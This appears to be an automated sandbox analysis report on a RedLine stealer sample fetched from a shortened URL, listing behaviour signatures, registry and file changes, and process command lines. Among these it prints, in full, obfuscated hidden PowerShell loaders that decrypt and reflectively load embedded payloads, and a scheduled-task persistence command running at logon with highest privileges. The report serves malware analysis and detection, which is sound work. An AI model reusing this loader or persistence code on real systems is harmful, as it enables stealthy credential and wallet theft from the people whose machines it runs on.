Analysis Overview
Threat Level: Known bad
The file https://clck.ru/3AmuGC was found to be: Known bad.
Malicious Activity Summary
RedLine payload
RedLine
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:24
Reported
2024-05-22 14:26
Platform
win10v2004-20240508-en
Max time kernel
104s
Max time network
105s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sxsczs = "C:\\Program Files\\- Windows.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\- Windows.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\Downloads\nurik.new.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://clck.ru/3AmuGC"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://clck.ru/3AmuGC
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.0.948761258\124717945" -parentBuildID 20230214051806 -prefsHandle 1808 -prefMapHandle 1788 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {060dfd9d-7348-4cea-8315-888575530815} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 1892 2447fcb9258 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.1.1703607064\1219344643" -parentBuildID 20230214051806 -prefsHandle 2476 -prefMapHandle 2472 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60664a33-bf16-43da-8f1c-b5e3e24e03dc} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 2488 24400191858 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.2.708460020\2072096402" -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 2988 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93b4af89-37f4-476b-ad70-6d4420320797} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3000 24402b3ac58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.3.1478035860\47476394" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7760548-6713-45a3-a6c3-9137a4bf946c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3680 244046f8558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.4.1731765788\190644778" -childID 3 -isForBrowser -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b66985a-32c3-4574-a881-7eeca3a3fffd} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5212 24405c54658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.5.1435030502\2082438215" -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5392 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd839d70-d97d-4d6a-880a-f0bf98104349} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5404 24405ccce58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.6.1430726149\1216636621" -childID 5 -isForBrowser -prefsHandle 5532 -prefMapHandle 5540 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8795af3-8c5c-4548-ad47-cc78cd8eeac0} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5524 24405ccbc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.7.526838876\820828326" -childID 6 -isForBrowser -prefsHandle 3024 -prefMapHandle 3012 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca9f24db-5b7d-4bff-9eb7-088c0bdd6a99} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3112 24402b3a358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.8.2086656866\209819466" -childID 7 -isForBrowser -prefsHandle 6032 -prefMapHandle 3004 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {471c0c77-4a45-4bb2-b251-bfd5d7cfe99c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 6004 24405ccb058 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x320
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\nurik.new.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\nurik.new.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P18ifcCBzSiyBMZ7t/92DzfEEOiWB3GmB8u/Mgq96gE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XtxZehJC17SekGwMyNi97g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ILhZH=New-Object System.IO.MemoryStream(,$param_var); $qnbTK=New-Object System.IO.MemoryStream; $mNcWm=New-Object System.IO.Compression.GZipStream($ILhZH, [IO.Compression.CompressionMode]::Decompress); $mNcWm.CopyTo($qnbTK); $mNcWm.Dispose(); $ILhZH.Dispose(); $qnbTK.Dispose(); $qnbTK.ToArray();}function execute_function($param_var,$param2_var){ $RQKZp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BSkcv=$RQKZp.EntryPoint; $BSkcv.Invoke($null, $param2_var);}$VBZKk = 'C:\Users\Admin\Desktop\nurik.new.bat';$host.UI.RawUI.WindowTitle = $VBZKk;$VlTIu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VBZKk).Split([Environment]::NewLine);foreach ($eCJBm in $VlTIu) { if ($eCJBm.StartsWith(':: ')) { $NXiAz=$eCJBm.Substring(3); break; }}$payloads_var=[string[]]$NXiAz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\build.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Client.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BTcwzASLmoJ1ZL5KXzMu6IXsKQtggQBLKxtGQGMVivg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBdf9vHDF4tEqjyQFw5gmw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oeZpq=New-Object System.IO.MemoryStream(,$param_var); $LpLBA=New-Object System.IO.MemoryStream; $yGtlM=New-Object System.IO.Compression.GZipStream($oeZpq, [IO.Compression.CompressionMode]::Decompress); $yGtlM.CopyTo($LpLBA); $yGtlM.Dispose(); $oeZpq.Dispose(); $LpLBA.Dispose(); $LpLBA.ToArray();}function execute_function($param_var,$param2_var){ $ioASE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AYHvj=$ioASE.EntryPoint; $AYHvj.Invoke($null, $param2_var);}$uUZMh = 'C:\Users\Admin\AppData\Local\Temp\build.bat';$host.UI.RawUI.WindowTitle = $uUZMh;$VBUID=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uUZMh).Split([Environment]::NewLine);foreach ($iadWj in $VBUID) { if ($iadWj.StartsWith(':: ')) { $IczyE=$iadWj.Substring(3); break; }}$payloads_var=[string[]]$IczyE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bOD4h9qfBjd+kzpHQzYVb/xtS9DlFXtyObsrSvfEJ2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K0AyqGjRg+qdDkB+SoyHFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Isgcp=New-Object System.IO.MemoryStream(,$param_var); $CsNhz=New-Object System.IO.MemoryStream; $MqzLV=New-Object System.IO.Compression.GZipStream($Isgcp, [IO.Compression.CompressionMode]::Decompress); $MqzLV.CopyTo($CsNhz); $MqzLV.Dispose(); $Isgcp.Dispose(); $CsNhz.Dispose(); $CsNhz.ToArray();}function execute_function($param_var,$param2_var){ $NyVPO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BQjsX=$NyVPO.EntryPoint; $BQjsX.Invoke($null, $param2_var);}$NxkMh = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $NxkMh;$FDOzr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NxkMh).Split([Environment]::NewLine);foreach ($CzgRn in $FDOzr) { if ($CzgRn.StartsWith(':: ')) { $TZczo=$CzgRn.Substring(3); break; }}$payloads_var=[string[]]$TZczo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SYSTEM32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe"
Network
Files